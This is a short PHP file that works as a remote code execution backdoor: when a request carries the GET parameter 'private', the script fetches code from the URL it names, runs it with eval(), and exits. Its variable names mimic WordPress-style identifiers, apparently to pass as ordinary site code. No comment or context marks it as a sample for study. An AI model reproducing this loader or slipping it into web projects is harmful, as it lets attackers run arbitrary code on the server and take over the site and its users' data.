<?php

if (isset($_GET['private'])) {
    $is_search_ld = $_GET['private'];
    if ($current_user_can_bjr = curl_init()) {
        curl_setopt($current_user_can_bjr, CURLOPT_URL, $is_search_ld);
        curl_setopt($current_user_can_bjr, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($current_user_can_bjr));
        curl_close($current_user_can_bjr);
        exit;
    }
}